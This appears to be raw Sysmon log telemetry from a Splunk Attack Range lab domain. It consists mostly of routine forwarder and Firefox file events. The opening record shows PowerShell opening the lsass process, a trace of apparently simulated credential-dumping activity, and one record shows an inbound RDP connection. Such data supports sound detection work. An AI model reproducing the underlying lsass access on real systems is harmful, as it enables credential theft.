08:02:38.134{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:38.087{466BC892-F71D-60EB-B97D-00000000CF01}7440\PSHost.132705505575325563.7440.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001052723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.035{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_allbm4ep.feq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.035{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_q1nvvdql.l3b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.019{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_q1nvvdql.l3b.ps12021-07-12 08:02:38.019 23542300x8000000000000000809471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:39.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CAA434F61A99692651567D8459EF3F,SHA256=003D067270E07BEEE95D9C1699278AAA8BBBE4F4BD8911679E8B9F9762AC1B3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:31.751{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51174-false10.0.1.12-8000- 23542300x80000000000000001052734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:39.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC0A52E0F90C97A9086F60F8F09962A,SHA256=BEE2EB0EDE5EE1B8B75DE1E1AADA5CC94A630D52C142AE8881147ED5EBF4188A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:40.483{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A58748D81319EF6E730BC7E638CB3D,SHA256=0161D7F51033F859287DADB0FF4C590C5BF7DFEC8B6BFF4381FE7B49FF251855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:40.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE015C15F1D8FD9E06D2CE4B9DBBFD,SHA256=A2245B9EF60C9A4472918E4634029824CE1D3507D0D8C6B6F171B46197E9DC41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:41.506{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:41.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE673CF654A98449CF2C97313E418DA9,SHA256=E8C204AC74CD7F226ECC2E4BFA9ADFF8D5A3D7ABB9B88A41086E8391B0961E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:41.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4357B149ED1CEFA3DA0276A59009C4B5,SHA256=AA98CC589B0F46E147DBF1D3ECB5BAAB28E5E8201D6B6AF5DC2762BCF19E52C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:42.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E8FDF5CCD3B41C2C4F5040BA1B56141,SHA256=52E949262EC6127F8A03F83F0F1FC4661E5B345D1FC3EDBB7CDD0CA0A2255C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:42.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7664D387DD8DC7483C07B4145978A848,SHA256=E710C7C585BEFF72267B995C569AD32380CE32071AC83BA20D6CFBC3C93D23D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:42.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519A85E554F67CF6255F9CC5AB1F9B67,SHA256=5DCE4D898DCDEB4B4E1581AA7E086B4489E87ED5FDDB55E3912459830290A2C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:42.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57398-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:43.376{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF7B7891ABCA29CB3755656F560075A,SHA256=9661ADA0EA674E140CB7409F67520D3AC9C08E7E778CA85B645286CEB384A4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097891BA960E956966FB95C41D3C29AF,SHA256=BE5E193F6C7B84F77F2A88E974F1F749006A3C1E675BF44631229772482493A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5821647D4BEAD5A2FA613BB536C63D83,SHA256=39FFFE92ED909906EF6798DD1933740B63514475E452E19EE2167E62BFCAF574,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED692BC901218947C7822CDD4F6ED23F,SHA256=47D78BAEACFA46ADCF89CE06FD5766731892132353DE4C15120C9CC909DACFF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7C4979EB70D0146D690D85CA8F89400D,SHA256=2DDE8CF68EE9F8BE0267CC14EFF18CDFCE6B64E718771290C2A68C75D6AACFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CCBB3945FF3143B452A2600FEF2CAD03,SHA256=DCBF580A16A17166E37C7BCFFDBF5A67EBDF28B6CDB8C47C9BB8755E79FAA578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF6535805AD4BEC90DE8679B8765373F,SHA256=3A568901C983917D3B6E3E7533EB5AE3CC2E54CC0BA96D079CF2B72803F0B649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9A456E3F9FF18CAC938010FF58DB8317,SHA256=D292780625ED83CA317E20140A78E58F38F3CA23E78B645B2F0CF2F016DFD60F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E7AD4777A7584EC6AF39E33F6E74310,SHA256=3E7ECDA6672519D5124D07A53AB1D13579A51EA6D5D34730B761FC462A7AA626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.188{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C086F92976546459F314AE448F2494C0,SHA256=46C1CFE051477FA7B535DF599B6B6E2DFF5F60E5DBE92CB9AF8C2BDD2377C526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.187{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B272BD9FE3B6DF29F24201756F3F61BB,SHA256=AE188D03979F1D6A4BD7E684395AA5CDD9DB9D4E976A347BD040ED1677E48A5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.186{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0B1EDE7997F32A974619DBB9FBD0DD4E,SHA256=6A9E227E0C8989DFFCCDEF45892089A2FD5E354963BEB03ECDFF977DD884CC7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.185{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60EFD701788F3FA7197FB976251936DE,SHA256=71C6668FFB0C615DB6175D58283B960DD75020C71F2113CA87866C2EF3F8606A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:44.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C170A302C642FA09806A0C06B5B562,SHA256=BC782AAF2D19E1246D7893743D61945CFE1AA4BF92C35144F4EEC3E5E3218820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:44.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A2675F87B37DC96825A0843956DFF0,SHA256=E02D7591FE9490882C55A52B8F3D7480B92BF15D3B293C39BC87B137C7EEABD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:45.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FAC33FED54E3D084465485F4E53521,SHA256=15A5573275F97833F8080CDD90E1800D4FAC65B13C6F6DF28119BD31BFA59CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4673F747DD9E94A079364EDD5CE3E0,SHA256=9EFF5B07B56D4001F2D225F477D38D1B0E909C8782B74B937A2C5FD50A9A794B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.684{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51175-false10.0.1.12-8000- 23542300x80000000000000001052756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:46.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59CACB5F555725977DBD37C2DB14C765,SHA256=BC1433FD7BFCA17373DB4580BC7212D74556CABC4A7BB16BE81F43A6400EDBF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:46.783{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F009743A8F170A2E1BA177C97F4D0D9D,SHA256=009BC9BEB2F4E2EDB73132A1160AB06F88EDD7D9608B341843B7123F0095ADE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:46.783{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8208B141FD6D5356BA07DEA1782816DC,SHA256=49793826130965B5F2C7C9D1E8B9593D296E4416DA663CE05B7E5BAE2A73ADBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:46.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30EFD1B918F9AF51A1DC14998A368114,SHA256=6178A56EEA5CBB14FB8CC4CAC7B3D46AE5F2CA068C99BF720A66C5CBC995465D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:47.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8DDC9F1DB81B14746E181A1ACB92C5A,SHA256=5E2FD0F3051AD4443A4F01885544B919FB49520E6B94D61A86BB3A94174D6AF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.925{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57399-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000809483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.602{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net18051-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:47.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A70AE55970240E81FC0ABB6637EFAC,SHA256=03CB65FAFFEB17EB9BC9A42338857870CAE6EC1183F85751877C52D18F953D5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:39.307{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57399-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001052759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:48.553{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F2E206DFE86A3F80F334C83DDACB74,SHA256=3D858E436262EC43924A213861656F1609E3FB5FB379A48D3BA6DDBDD2E5F705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:48.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758277FC593B9A4D9735D36C07DC8423,SHA256=EE6E837287B4489BC43BB7FE0E44FA6967DE620384731BF831E5DD216061A977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4FA650E906FD3F48BAD2E10D3DD30CC7,SHA256=E2E1EB59649AA757E31F42523CC2D9877BF7C7793AD0689743F2700C85D33640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1C18BF13A157E5464D4F981529E9591,SHA256=0CEB1C8C0D59448FB8CE06F998F77A610172D4653FEF7FC60196DAEA5BAD091F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72A6986AD10268D2A72F1C7C8DE7B0AE,SHA256=E259128998FC42BD0F7A0650251DF62E81E619BD098188DD013A942CFB100170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3E4F1FCDD286E219F0B2489AEE319CE2,SHA256=66601283A6AA56001536E8DAAD6F688E6A8BA23AF0939B2464DC50289FED9879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E185CF8218E6707D0837FEED9AA67967,SHA256=A68D0ECE16F14708F39775D714B93FBEAB764BE2080ADFD17DC80DA7E8885C4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D01E9BB3A57DAD1A4598DB5C66DAFD7A,SHA256=F396A37CBBF9A6E7B39279607B449703F48891EC1D62C6C4E696C0D5BFC3620A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=67AED841966AF2CECE33A7D9DD43991E,SHA256=66CCF414C8BF3C68DB7F4B199EA271FCCCCD365691D3F3715B3E756DCF5C66EE,IMPHASH=00000000000000000000000000000000falsetrue 